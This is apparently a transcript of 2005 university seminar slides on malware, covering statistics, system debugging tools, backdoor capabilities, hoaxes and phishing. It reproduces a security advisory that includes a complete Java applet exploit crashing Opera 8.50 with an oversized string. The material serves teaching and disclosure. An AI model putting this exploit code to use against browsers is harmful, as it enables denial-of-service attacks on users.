Malware #2

Download Report

Transcript Malware #2 

Malware – Cont.
Maxim Vainstein & Emanuel Hahamov
HUJI, CS, Seminar in Software Design
08.12.2005
Malware Statistic
Malware Statistic Cont.
Take it “easy”…
Take it “easy”… (Cont.)
Malware – Example
Malware – Example(2)
Opera Java Applet DoS

Summary
Opera is "a computer application for handling most common
internet-related tasks, including: web browsing, sending and
receiving messages, managing contacts and online chat".
A vulnerability in a Opera allows remote attackers to cause the
program to crash by utilizing a malicious Java applet.

Details
Vulnerable Systems:
* Opera version 8.50
Immune Systems:
* Opera version 8.51
It is possible to crash the opera 8.50 browser with a simple java
Applet (see below). This was observed on Win32, Linux versions
maybe affected, too.
This can be tested at:
http://www.illegalaccess.org/exploit/opera85/OperaApplet.html
As you can see the applet crashes at 0x67c0a54c. This is caused
by a bug in a JNI routine implementing the com.opera.JSObject
class. It cannot beruled out, that this bug is exploitable.
The opera guys were informed on the 21st of September, and then
again on 8th of October.

Code

Additional Information
The information has been provided
by <mailto:[email protected]>
Marc Schoenefeld.
import java.applet.Applet;
import java.awt.Graphics;
import netscape.javascript.JSObject;
public class OperaTest extends Applet{
static
{
System.out.println("Loaded 1.2");
}
public void paint(Graphics g)
{
System.out.println("start");
try {
netscape.javascript.JSObject jso = JSObject.getWindow(this);
System.out.println(jso.getClass());
com.opera.JSObject j = (com.opera.JSObject ) jso;
char[] x = new char[1000000];
for (int y = 0 ; y < x.length; y++) {
x [y] = 'A';
}
String z = new String(x);
System.out.println("after evalb");
j.removeMember(z);
System.out.println("after remove");
}
catch (Exception e) {
e.printStackTrace();
}
}
}
System Debug Tools
 SysInternals www.sysinternals.com











Process Explorer
FileMon
RegMon
TcpView
TDIMon
WinObj
More…
Emsi A2-HijackFree
LSPfix
TaskManager16
Ethreal Network Sniffer
NetBus - Demo

Advanced Remote Control
 Backdoor
 Key logger
 Screen capture
 Multimedia Capture




Video
Sound
Microphone
False Remote
Administration/Helpdesk ?!
More Malware
Scams and Hoaxes

Malware-related


Scams And Shams



False Information (to force user for
unwanted action)
Luck-based hoaxes
Money-based hoaxes
Urban Legends
Jokes (JOKE_BURST.A, JOKE_TRAIN.B)

No malicious code, but can be noisy
Phishing –
Local/Web Network Redirection

False known website
Banks
 eCommerce
 eMails

Questions ?